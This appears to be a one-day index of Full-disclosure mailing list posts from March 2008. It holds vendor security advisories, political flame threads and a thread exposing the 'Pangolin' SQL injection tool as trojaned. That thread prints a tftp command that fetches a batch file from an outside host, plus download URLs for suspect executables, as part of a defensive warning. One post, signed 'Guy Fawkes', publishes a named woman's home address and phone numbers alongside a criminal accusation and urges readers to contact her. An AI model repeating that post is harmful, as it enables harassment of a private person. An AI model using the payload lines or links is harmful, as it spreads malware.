Re: [Full-disclosure] Free Iraq

2008-03-26 Thread josh
http://you.justgotowned.com Sent from my BlackBerry® smartphone with SprintSpeed -Original Message- From: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> Date: Wed, 26 Mar 2008 20:22:24 To:full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Free Iraq

Re: [Full-disclosure] Free Tibet..

2008-03-26 Thread Eduardo Tongson
Not just Tibet. PRC wants to own every land around them [1]. [1] On Wed, Mar 26, 2008 at 11:35 PM, Robert Smits <[EMAIL PROTECTED]> wrote: > On March 24, 2008 10:31:55 pm Jerome Jar wrote: > > Please, I humbly think that you know possibly nothing ab

[Full-disclosure] [ MDVSA-2008:078 ] - Updated openssh packages fix X connection hijacking

2008-03-26 Thread security
Mandriva Linux Security Advisory MDVSA-2008:078 http://www.mandriva.com/security/

Re: [Full-disclosure] Free Iraq

2008-03-26 Thread [EMAIL PROTECTED]
On Wed, Mar 26, 2008 at 3:55 PM, net-dummy wrote: > >Iraq is an invaded country, and America has no right to be there at all. > Actually, dummy... The Iraqi invasion of Kuwait in August of 1990 led to a United Nations au

[Full-disclosure] [ MDVSA-2008:077 ] - Updated perl-Tk packages fix GIF processing vulnerability

2008-03-26 Thread security
Mandriva Linux Security Advisory MDVSA-2008:077 http://www.mandriva.com/security/

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-26 Thread Micheal Cottingham
Just some interesting strings and such: pdf_poc.exe: http://analysis.seclab.tuwien.ac.at/result.php?taskid=024c7616e34fe444398545b69c829e1d&refresh=1 ..\\..\\..\\..\\windows\\system32\\cmd.exe ..\\..\\..\\..\\windows\\system32\\tftp.exe -i zwell.3322.org a.bat Cpdf_poc.txt Cpdf_poc.txt Cpdf_poc.

[Full-disclosure] [USN-596-1] Ruby vulnerabilities

2008-03-26 Thread Kees Cook
Ubuntu Security Notice USN-596-1 March 26, 2008 ruby1.8 vulnerabilities CVE-2007-5162, CVE-2007-5770 A security issue affects the following Ubuntu releases: Ubuntu

[Full-disclosure] [USN-595-1] SDL_image vulnerabilities

2008-03-26 Thread Kees Cook
Ubuntu Security Notice USN-595-1 March 26, 2008 sdl-image1.2 vulnerabilities CVE-2007-6697, CVE-2008-0544 A security issue affects the following Ubuntu releases: Ub

[Full-disclosure] [USN-594-1] libnet-dns-perl vulnerability

2008-03-26 Thread Kees Cook
Ubuntu Security Notice USN-594-1 March 26, 2008 libnet-dns-perl vulnerability CVE-2007-6341 A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS

[Full-disclosure] [USN-593-1] Dovecot vulnerabilities

2008-03-26 Thread Kees Cook
Ubuntu Security Notice USN-593-1 March 26, 2008 dovecot vulnerabilities CVE-2008-1199, CVE-2008-1218 A security issue affects the following Ubuntu releases: Ubuntu

[Full-disclosure] [ MDVSA-2008:076 ] - Updated wml packages fix symlink vulnerabilities

2008-03-26 Thread security
Mandriva Linux Security Advisory MDVSA-2008:076 http://www.mandriva.com/security/

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-26 Thread Russ McRee
http://www.nosec.org/web/files/demon.exe http://www.virustotal.com/analisis/0bfb9d08a2dfe0ad413d08491d0a82a3 http://www.nosec.org/web/files/pdf_poc.exe http://www.virustotal.com/analisis/d619319b2c4a7c5bb3a81adf25bf6559 http://www.nosec.org/web/files/zps.exe http://www.virustotal.com/analisis/26d

[Full-disclosure] Multiple vulnerabilities in solidDB 06.00.1018

2008-03-26 Thread Luigi Auriemma
Luigi Auriemma Application: IBM solidDB http://www.solidtech.com/en/products/relationaldatabasemanagementsoftware/embed.asp Versions: <= 06.00.1018 Platforms: Windows (test

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-26 Thread Tim Kunschke
Ok, you are right. [EMAIL PROTECTED] ~ % wget http://www.nosec.org/web/index.txt :( --20:23:14-- http://www.nosec.org/web/index.txt => `index.txt' Auflösen des Hostnamen »

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-26 Thread Micheal Cottingham
Not yet. C:\Users\Micheal\Research>wget http://www.nosec.org/web/index.txt --15:12:52-- http://www.nosec.org/web/index.txt => `index.txt' Resolving www.nosec.org... done. Connecting to www.nosec.org[218.92.8.74]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQL injector you've ever seen

2008-03-26 Thread Tim Kunschke
o0 hmm nice try 0o I will not really know how many people now have a trojan horse or worm on their PC. snake [EMAIL PROTECTED] wrote: > > Pangolin is a GUI tool running on Windows to perform as more as > possible pen-testing through SQL injection. This version now supports > followin

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-26 Thread Tim Kunschke
With firefox - URL: *http://www.nosec.org/a.exe* http://www.w3.org/TR/html4/strict.dtd";> ?? BODY { font: 9pt/12pt ?? } H1 { font: 12pt/15pt ?? } H2 { font: 9pt/12pt ?? } A:link { color: red } A:visited { color: maroon } ?? ???: ?

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-26 Thread Ricardo Giorgi
Hi folks, just out of curiosity, has anyone on this list already tried to reverse engineer Pangolin's code? Ricardo > Not me, although I did look at it. I thought great, kiddies are going to love this > Sent from my BlackBerry® smartphone with SprintSpeed > > -Original Messag

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-26 Thread Micheal Cottingham
C:\Users\Micheal\Research>..\bin\upx\upx -d pangolin_bin\out\pangolin.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007 UPX 3.02w Markus Oberhumer, Laszlo Molnar & John Reiser Dec 16th 2007 File size

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQLinjector you've ever seen

2008-03-26 Thread josh
Not me, although I did look at it. I thought great, kiddies are going to love this Sent from my BlackBerry® smartphone with SprintSpeed -Original Message- From: davidrook <[EMAIL PROTECTED]> Date: Wed, 26 Mar 2008 17:23:03 To:Razi Shaban <[EMAIL PROTECTED]> Cc:full-disclosure@lists.gr

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQL injector you've ever seen

2008-03-26 Thread davidrook
I wonder how many readers of this list now have a backdoor on their machine... Razi Shaban wrote: > Hmm... > Backdoors eh? > > Nice try. > > -- > razi > > On 3/26/08, A. Ramos <[EMAIL PROTECTED]> wrote: > >> Take a look over: >> http://www.virustotal.com/analisis/0603d534b0128bf81ec57

[Full-disclosure] ZDI-08-013: Novell eDirectory for Linux Stack Overflow

2008-03-26 Thread zdi-disclosures
ZDI-08-013: Novell eDirectory for Linux Stack Overflow http://www.zerodayinitiative.com/advisories/ZDI-08-013 March 26, 2008 -- CVE ID: CVE-2008-0924 -- Affected Vendors: Novell -- Affected Products: Novell eDirectory -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQL injector you've ever seen

2008-03-26 Thread Razi Shaban
Hmm... Backdoors eh? Nice try. -- razi On 3/26/08, A. Ramos <[EMAIL PROTECTED]> wrote: > Take a look over: > http://www.virustotal.com/analisis/0603d534b0128bf81ec57a8ab00e145c > > > > 2008/3/26 <[EMAIL PROTECTED]>: > > > > > > > > > > > Pangolin is a GUI tool running on Windows to perfor

Re: [Full-disclosure] Pangolin v1.2.590 - The best SQL injector you've ever seen

2008-03-26 Thread A. Ramos
Take a look over: http://www.virustotal.com/analisis/0603d534b0128bf81ec57a8ab00e145c 2008/3/26 <[EMAIL PROTECTED]>: > > > > > Pangolin is a GUI tool running on Windows to perform as more as possible > pen-testing through SQL injection. This version now supports following > databases and operat

[Full-disclosure] Cisco Security Advisory: Cisco IOS Multicast Virtual Private Network (MVPN) Data Leak

2008-03-26 Thread Cisco Systems Product Security Incident Response Team
Cisco Security Advisory: Cisco IOS Multicast Virtual Private Network (MVPN) Data Leak Advisory ID: cisco-sa-20080326-mvpn http://www.cisco.com/warp/public/707/cisco-sa-20080326-mvpn.shtml Revision 1.0 For Public Release

[Full-disclosure] Cisco Security Advisory: Cisco IOS Virtual Private Dial-up Network Denial of Service Vulnerability

2008-03-26 Thread Cisco Systems Product Security Incident Response Team
Cisco Security Advisory: Cisco IOS Virtual Private Dial-up Network Denial of Service Vulnerability Advisory ID: cisco-sa-20080326-pptp http://www.cisco.com/warp/public/707/cisco-sa-20080326-pptp.shtml Revision 1.0 For

[Full-disclosure] Cisco Security Advisory: Vulnerability in Cisco IOS with OSPF, MPLS VPN, and Supervisor 32, Supervisor 720, or Route Switch Processor 720

2008-03-26 Thread Cisco Systems Product Security Incident Response Team
Cisco Security Advisory: Vulnerability in Cisco IOS with OSPF, MPLS VPN, and Supervisor 32, Supervisor 720, or Route Switch Processor 720 Advisory ID: cisco-sa-20080326-queue http://www.cisco.com

[Full-disclosure] Pangolin v1.2.590 - The best SQL injector you've ever seen

2008-03-26 Thread zwell
Pangolin is a GUI tool running on Windows to perform as more as possible pen-testing through SQL injection. This version now supports following databases and operations:* MSSQL : Server informations, Datas, CMD execute, Regedit, Write file, Download file, Read file, File Browser...* MYSQL : Ser

[Full-disclosure] [USN-592-1] Firefox vulnerabilities

2008-03-26 Thread Jamie Strandboge
Ubuntu Security Notice USN-592-1 March 26, 2008 firefox vulnerabilities CVE-2007-4879, CVE-2008-0416, CVE-2008-1195, CVE-2008-1233, CVE-2008-1234, CVE-2008-1235, CVE-2008-1236, CVE-2008-1237, CVE-2008-1238, CVE-2008-1240, CVE-

[Full-disclosure] Free Iraq..

2008-03-26 Thread n3td3v
On Wed, Mar 26, 2008 at 3:35 PM, Robert Smits <[EMAIL PROTECTED]> wrote: > Tibet is an invaded country, and China has no right to be there at all. Iraq is an invaded country, and America has no right to be there at all.

Re: [Full-disclosure] Free Tibet..

2008-03-26 Thread Robert Smits
On March 24, 2008 10:31:55 pm Jerome Jar wrote: > Please, I humbly think that you know possibly nothing about Tibet, the > province of China. > > A lot of Chinese people, who used to take western medias as the > representation of good will and perhaps democracy, do feel sick of the > misleading new

Re: [Full-disclosure] Free Tibet..

2008-03-26 Thread Razi Shaban
People of little intellect cannot be persuaded through intelligent debate, flaming doesn't work either. I suggest you all stop, as you're doing nothing but wasting your own time. -- razi On 3/26/08, Adam Hunt <[EMAIL PROTECTED]> wrote: > Jun, Jun, Jun, > > If you're going to go back that far your

Re: [Full-disclosure] Free Tibet..

2008-03-26 Thread Adam Hunt
Jun, Jun, Jun, If you're going to go back that far you're going to have to redraw many lines on the globe. Or is the PRC a special case? Let's pick a place in recent history as a starting point. I'm sure that you will find that the PRC is still bad and has no right to hold any country captive. T

Re: [Full-disclosure] Jan Kruska

2008-03-26 Thread KJK::Hyperion
Guy Fawkes is the new Luther Blisset ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Free Tibet..

2008-03-26 Thread [EMAIL PROTECTED]
Missile Heads? Good God... You sound almost as stupid as that idiot who called Tibet a province of China. Short of global thermonuclear war, nothing is going to change in Tibet in our lifetimes; and there is nothing the people reading this list can do about that. And I want the 3 minutes back th

Re: [Full-disclosure] Native American Indians Reassert Control Over Tribal Lands

2008-03-26 Thread Anja Hofmann
Hi! Jon O. wrote: > But, this is a security list, so please protest in person, > leak some .cn gov documents or do something useful -- you'll > just get flamed posting political rants. > Thank you for your email - if more political postings containing "sensitive" keywords show up, this might m

Re: [Full-disclosure] Static Injection into Commercial Lines - DoS on Vonage - Current Status

2008-03-26 Thread Anja Hofmann
Hi! Jan Clairmont wrote: > I have received calls and the caller is injected with a sound similar to a > fax modem static. Now my outbound callers hear static. This is obviously a > problem either with Comcasts injecting noise packets or Verizon or a carrier > that carries the VOIP call. This

Re: [Full-disclosure] Static Injection into Commercial Lines - DoS on Vonage - Current Status

2008-03-26 Thread Philip Fagan
Could be reflection on the transport -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Kern Sent: Tuesday, March 25, 2008 10:56 AM To: Jan Clairmont Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Static Injection into Commercial

[Full-disclosure] rPSA-2008-0120-1 gnome-ssh-askpass openssh openssh-client openssh-server

2008-03-26 Thread rPath Update Announcements
rPath Security Advisory: 2008-0120-1 Published: 2008-03-25 Products: rPath Linux 1 rPath Appliance Platform Linux Service 1 Rating: Major Exposure Level Classification: Local User Deterministic Unauthorized Access Updated Versions: [EMAIL PROTECTED]:1/4.7p1-0.2-1 [EMAIL PROTECT

[Full-disclosure] rPSA-2008-0123-1 ruby

2008-03-26 Thread rPath Update Announcements
rPath Security Advisory: 2008-0123-1 Published: 2008-03-25 Products: rPath Linux 1 rPath Appliance Platform Linux Service 1 Rating: Minor Exposure Level Classification: Remote Deterministic Information Exposure Updated Versions: [EMAIL PROTECTED]:1/1.8.6_p114-1-0.1 rPath Issue Tra

[Full-disclosure] Jan Kruska

2008-03-26 Thread Guy Fawkes
Jan Kruska is a pedophile that had sex with a child when she was 22 years old. Now she campaigns to let others have sex with children. If you disagree with her, feel free to let her know. You can contact Jan at: Jan Kruska 4102 W Woodridge Dr. Glendale, Arizona 85308 (503) 389-7679 (602) 579-8

Re: [Full-disclosure] Free Tibet..

2008-03-26 Thread Mr . Rain
Hi Adam, Nice talking to you. First, please pull your head out of your *great education*. Have you ever read Chinese history books (Note: This is not written by this government but every dynasty)? And how many have you read? And please make clear who is "lack of knowlege". "Tibet was invaded during